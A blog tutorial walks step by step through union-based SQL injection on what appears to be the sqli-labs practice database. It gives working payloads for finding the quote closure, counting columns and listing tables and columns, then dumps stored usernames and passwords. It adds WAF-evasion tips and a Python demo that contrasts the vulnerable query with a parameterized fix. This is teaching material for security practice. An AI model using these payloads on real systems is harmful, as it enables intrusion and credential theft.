SQL injection basics: union-based character injection (part 2)

# Premise

The first thing to do for any injection is to determine whether the injection point is character (string) type or numeric type. If it is numeric, you do not need to care about how the value is closed (quoted).

Here we have already determined that the parameter is closed with a ' single quote. Once the closing method is confirmed, we append --+ to comment out everything that follows our input in the original query.

Because we typed an extra ' to close the value, the query's own closing single quote is left dangling after our input, so --+ is needed to comment it out; otherwise it causes a syntax error and interferes with the injection test.

The SQL we want to test then goes in the middle, between our closing quote and the comment.

# Process

1. Find the injection point

2. Determine whether it is character type or numeric type (and 1=1 / and 1=2, or an arithmetic probe such as 3-1)

3. Determine the closing method (candidates: ' , ') , " , ") , ) )

4. Determine the number of fields (group by / order by)

5. Determine which fields are displayed on the page (-1 union select 1,2,3...)

6. Determine the database name (database())

7. Determine the table names in that database (table_name from information_schema.tables)

8. Get the fields (columns) of the table (column_name from information_schema.columns)

9. Dump the data

Supplement: for numeric injection, skip the step of determining the closing method.

Demo case:

1. Find the injection point

2. Determine character type vs numeric type

Original page output:

name:stupid

Request the same page with 5-1 in place of the value:

name:stupid

The page output is unchanged (if the parameter were numeric, 5-1 would have been evaluated as 4 and the page would change), which confirms the parameter is character type.

3. Determine the closing method

Test ' , ') , ") and " in turn; whichever one makes the page return an error, take the returned error message and examine it further.

Here is the error returned for '

Strip the outer single quotes that belong to the error message itself, leaving only the fragment of the original statement.

(In the screenshot) the red part is what we entered.

What remains shows that the original query wraps the value in ' '.

Confirmed: the closing method is ' '.

4. Determine the number of fields

Query the field count with:

group by

order by

Note: group by is recommended because order by is often filtered by WAF software. If group by produces errors, fall back to order by.

Since we supplied the closing ', we must use --+ to comment out the query's own '.

Put group by N in the middle and increase N.

An error is reported when N reaches 4.

With group by 3, the page is normal.

So the number of fields is 3.

5. Determine which fields are displayed on the page

-5' union select 1,2,3 --+

The fields displayed on the page are:

2,3

6. Determine the database name

database(): the database currently in use

-5' union select 1,database(),3 --+

Determine the database name 

security

7. Query all table names in the security database

-5' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

or

-5' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

The first form is better for bypassing a WAF, since it needs no quoted string literal.

 Right click -> view page source code

All data tables of the security database are as follows

emails,

referers,

uagents,

users

8. Get the fields (query all columns of the users table)

-5' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+

or

-5' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

The fields are:

id,

username,

password

9. Dump the data

-5' union select 1,2,group_concat(username,'--',password) from security.users --+


Dumb--Dumb,

Angelina--I-kill-you,

Dummy--p@ssword,

secure--crappy,

stupid--stupidity,

superman--genius,

batman--mob!le,

admin--admin,

admin1--admin1,

admin2--admin2,

admin3--admin3,

Dhakan-Dumbo,

admin4--admin4

The above is the username and password of every user in the users table.

Note: Personally, I think the data retrieved with hex is more complete... In an earlier experiment, group_concat(table_name) did not return a lot of the table-name information, but hex(group_concat(table_name)) returned more... It depends on the person; I still prefer hex.
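The mechanism behind steps 3 and 5 above, as an added example that is not from the original post: a constructed sqlite3 stand-in for the tutorial's users table, assuming the vulnerable page builds its query as WHERE id='<input>' (the sqli-labs shape), shown beside the parameterized fix that makes the same inputs harmless.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the tutorial's security.users table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1,'Dumb','Dumb'), (2,'Angelina','I-kill-you'),
                                 (3,'Dummy','p@ssword');
    """)
    return conn


def lookup_unsafe(conn, user_id):
    # Assumed vulnerable shape (as in sqli-labs): the raw parameter is spliced into
    # the SQL text inside single quotes, so a quote in the input ends the literal.
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}' LIMIT 1"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    # Hardened form: a bound parameter is sent as a value and never parsed as SQL,
    # so quotes, UNION and comment sequences in the input cannot change the query.
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (user_id,)).fetchall()


def probe(lookup, conn, value):
    """Run one lookup and report what the page would show: rows or a DB error."""
    try:
        return ("rows", lookup(conn, value))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    # Step 3: a stray quote makes the vulnerable query fail, and that error text is
    # what reveals the closing method; the safe query just finds no such id.
    print(probe(lookup_unsafe, db, "1'"))
    print(probe(lookup_safe, db, "1'"))
    # Step 5: closing quote + UNION replaces the result with attacker-chosen columns
    # in the unsafe query; the parameterized one returns no row for that literal.
    payload = "-5' union select 1,2,3 --"
    print(probe(lookup_unsafe, db, payload))
    print(probe(lookup_safe, db, payload))
```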


Source: blog.csdn.net/m0_72755466/article/details/129761763